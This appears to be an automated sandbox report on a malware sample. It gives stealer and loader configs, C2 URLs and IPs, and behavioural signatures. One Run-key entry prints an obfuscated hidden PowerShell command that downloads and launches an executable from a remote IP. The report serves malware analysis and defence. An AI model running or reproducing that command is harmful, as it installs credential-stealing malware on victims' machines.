Analysis
-
max time kernel
150s -
max time network
156s -
platform
windows10_x64 -
resource
win10v20210410 -
submitted
12-08-2021 04:27
Static task
static1
Behavioral task
behavioral1
Sample
92b685aedd90d350504624e142c53b24.exe
Resource
win7v20210408
Behavioral task
behavioral2
Sample
92b685aedd90d350504624e142c53b24.exe
Resource
win10v20210410
General
-
Target
92b685aedd90d350504624e142c53b24.exe
-
Size
319KB
-
MD5
92b685aedd90d350504624e142c53b24
-
SHA1
ab0db0c63accdd0d6b83f995d302b5885c60d9ad
-
SHA256
e0be41471fb0457c80e1c8a10efc91c223183838ecadbddd200376cfd9c2721a
-
SHA512
2fabf92a35a53810c576d06f710659b268f660e81be072dc133a786c1d669d161d6007d6e13b710a7170db6fb9333f2903991b479818c3eac9cef00c4e181dbe
Malware Config
Extracted
http://91.241.19.52/Api/GetFile2
Extracted
smokeloader
2020
http://readinglistforjuly1.xyz/
http://readinglistforjuly2.xyz/
http://readinglistforjuly3.xyz/
http://readinglistforjuly4.xyz/
http://readinglistforjuly5.xyz/
http://readinglistforjuly6.xyz/
http://readinglistforjuly7.xyz/
http://readinglistforjuly8.xyz/
http://readinglistforjuly9.xyz/
http://readinglistforjuly10.xyz/
http://readinglistforjuly1.site/
http://readinglistforjuly2.site/
http://readinglistforjuly3.site/
http://readinglistforjuly4.site/
http://readinglistforjuly5.site/
http://readinglistforjuly6.site/
http://readinglistforjuly7.site/
http://readinglistforjuly8.site/
http://readinglistforjuly9.site/
http://readinglistforjuly10.site/
http://readinglistforjuly1.club/
http://readinglistforjuly2.club/
http://readinglistforjuly3.club/
http://readinglistforjuly4.club/
http://readinglistforjuly5.club/
http://readinglistforjuly6.club/
http://readinglistforjuly7.club/
http://readinglistforjuly8.club/
http://readinglistforjuly9.club/
http://readinglistforjuly10.club/
Extracted
raccoon
2ca2376c561d1af7f8b9e6f3256b06220a3db187
-
url4cnc
https://telete.in/johnyes13
Extracted
redline
@gasfer_dark
207.154.240.76:80
Extracted
raccoon
cd8dc1031358b1aec55cc6bc447df1018b068607
-
url4cnc
https://telete.in/jagressor_kz
Extracted
raccoon
471c70de3b4f9e4d493e418d1f60a90659057de0
-
url4cnc
https://telete.in/p1rosto100xx
Signatures
-
Process spawned unexpected child process 4 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4764 2484 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4712 2484 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4796 2484 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4860 2484 schtasks.exe -
Raccoon Stealer Payload 4 IoCs
Processes:
resource yara_rule behavioral2/memory/2344-173-0x0000000002E30000-0x0000000002EC3000-memory.dmp family_raccoon behavioral2/memory/2344-178-0x0000000000400000-0x0000000002CB1000-memory.dmp family_raccoon behavioral2/memory/3360-193-0x0000000000400000-0x0000000000946000-memory.dmp family_raccoon behavioral2/memory/4384-549-0x0000000000400000-0x0000000000495000-memory.dmp family_raccoon -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 4 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\C858.exe family_redline C:\Users\Admin\AppData\Local\Temp\C858.exe family_redline C:\Users\Admin\AppData\Local\Temp\DCEE.exe family_redline C:\Users\Admin\AppData\Local\Temp\DCEE.exe family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
Processes:
WerFault.exedescription pid process target process PID 2948 created 2344 2948 WerFault.exe D4FD.exe -
suricata: ET MALWARE Sharik/Smoke CnC Beacon 11
suricata: ET MALWARE Sharik/Smoke CnC Beacon 11
-
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 39 2464 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 64 IoCs
Processes:
BCCE.exeBCCE.tmpBCCE.exeBCCE.tmpC858.exeCCDD.exefsucenter.exeD01A.exeD4FD.exeD78E.exeRuntimebroker.exeDCEE.exeD01A.exeDatabase.exeinstall.exeHostData.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeinstall.exeinstall.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeexplorer.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exepid process 2296 BCCE.exe 1460 BCCE.tmp 2208 BCCE.exe 684 BCCE.tmp 1160 C858.exe 4000 CCDD.exe 3864 fsucenter.exe 2784 D01A.exe 2344 D4FD.exe 3360 D78E.exe 3776 Runtimebroker.exe 2960 DCEE.exe 4384 D01A.exe 4592 Database.exe 4652 install.exe 4680 HostData.exe 4700 Database.exe 4792 Database.exe 4864 Database.exe 4980 Database.exe 5072 Database.exe 5108 Database.exe 4168 Database.exe 4228 Database.exe 4100 Database.exe 4176 Database.exe 2408 Database.exe 4312 Database.exe 1348 Database.exe 3756 Database.exe 2960 Database.exe 4424 Database.exe 2764 Database.exe 4480 Database.exe 3860 Database.exe 4476 Database.exe 2868 Database.exe 848 Database.exe 2752 Database.exe 4552 Database.exe 3924 Database.exe 3952 install.exe 1636 install.exe 4580 Database.exe 1240 Database.exe 4752 Database.exe 4964 Database.exe 4980 Database.exe 5112 Database.exe 3472 Database.exe 2268 explorer.exe 4224 Database.exe 4228 Database.exe 4172 Database.exe 2788 Database.exe 3680 Database.exe 2328 Database.exe 4268 Database.exe 1108 Database.exe 4428 Database.exe 3888 Database.exe 3732 Database.exe 1304 Database.exe 800 Database.exe -
Checks BIOS information in registry 2 TTPs 64 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
Database.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeC858.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C858.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe -
Deletes itself 1 IoCs
Processes:
pid process 3036 -
Drops startup file 1 IoCs
Processes:
Runtimebroker.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sound device.lnk Runtimebroker.exe -
Loads dropped DLL 6 IoCs
Processes:
fsucenter.exeD78E.exepid process 3864 fsucenter.exe 3360 D78E.exe 3360 D78E.exe 3360 D78E.exe 3360 D78E.exe 3360 D78E.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\C858.exe themida C:\Users\Admin\AppData\Local\Temp\C858.exe themida behavioral2/memory/1160-141-0x0000000001280000-0x0000000001281000-memory.dmp themida -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 5 IoCs
Processes:
install.exepowershell.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\services = "\"C:\\Documents and Settings\\services.exe\"" install.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\fsucenter = "\"C:\\Users\\Admin\\AppData\\Roaming\\BI Video Controller for x86 systems\\log20210812_043241\\fsucenter.exe\"" install.exe Set value (str) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Windows\CurrentVersion\Run\Sound device = "Cmd.Exe /c POwERsheLl -WinD HIDDen -CoMmAN (New-Object System.Net.WebClient).DownloadFile(('http://91.241.19.52/Ru'+'nti'+'m'+'ebr'+'oke'+'r.exe'),($env:TEMP+'\\Vp'+'nm.e'+'xe'));Start-Process ($env:TEMP+'\\V'+'pn'+'m.exe')" powershell.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\fsucenter = "\"C:\\Users\\Admin\\AppData\\Roaming\\BI Video Controller for x86 systems\\log20210812_043303\\fsucenter.exe\"" install.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\explorer = "\"C:\\Windows\\twain_32\\explorer.exe\"" install.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
Database.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeC858.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C858.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 64 IoCs
Processes:
C858.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exepid process 1160 C858.exe 4592 Database.exe 4592 Database.exe 4592 Database.exe 4700 Database.exe 4700 Database.exe 4700 Database.exe 4792 Database.exe 4792 Database.exe 4792 Database.exe 4864 Database.exe 4864 Database.exe 4864 Database.exe 4980 Database.exe 4980 Database.exe 4980 Database.exe 5072 Database.exe 5072 Database.exe 5072 Database.exe 5108 Database.exe 5108 Database.exe 5108 Database.exe 4168 Database.exe 4168 Database.exe 4168 Database.exe 4228 Database.exe 4228 Database.exe 4228 Database.exe 4100 Database.exe 4100 Database.exe 4100 Database.exe 4176 Database.exe 4176 Database.exe 4176 Database.exe 2408 Database.exe 2408 Database.exe 2408 Database.exe 4312 Database.exe 4312 Database.exe 4312 Database.exe 1348 Database.exe 1348 Database.exe 1348 Database.exe 3756 Database.exe 3756 Database.exe 3756 Database.exe 2960 Database.exe 2960 Database.exe 2960 Database.exe 4424 Database.exe 4424 Database.exe 4424 Database.exe 2764 Database.exe 2764 Database.exe 2764 Database.exe 4480 Database.exe 4480 Database.exe 4480 Database.exe 3860 Database.exe 3860 Database.exe 3860 Database.exe 4476 Database.exe 4476 Database.exe 4476 Database.exe -
Suspicious use of SetThreadContext 3 IoCs
Processes:
92b685aedd90d350504624e142c53b24.exeD01A.exeinstall.exedescription pid process target process PID 2016 set thread context of 2884 2016 92b685aedd90d350504624e142c53b24.exe 92b685aedd90d350504624e142c53b24.exe PID 2784 set thread context of 4384 2784 D01A.exe D01A.exe PID 4652 set thread context of 1636 4652 install.exe install.exe -
Drops file in Windows directory 2 IoCs
Processes:
install.exedescription ioc process File created C:\Windows\twain_32\7a0fd90576e08807bde2cc57bcf9854bbce05fe3 install.exe File created C:\Windows\twain_32\explorer.exe install.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 5 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target process target process 3980 2344 WerFault.exe D4FD.exe 2772 2344 WerFault.exe D4FD.exe 964 2344 WerFault.exe D4FD.exe 3180 2344 WerFault.exe D4FD.exe 2948 2344 WerFault.exe D4FD.exe -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
92b685aedd90d350504624e142c53b24.exedescription ioc process Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 92b685aedd90d350504624e142c53b24.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 92b685aedd90d350504624e142c53b24.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 92b685aedd90d350504624e142c53b24.exe -
Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 4764 schtasks.exe 4712 schtasks.exe 4796 schtasks.exe 4860 schtasks.exe -
Modifies registry class 3 IoCs
Processes:
install.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings install.exe -
Processes:
fsucenter.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 fsucenter.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c000000010000000400000000080000090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3c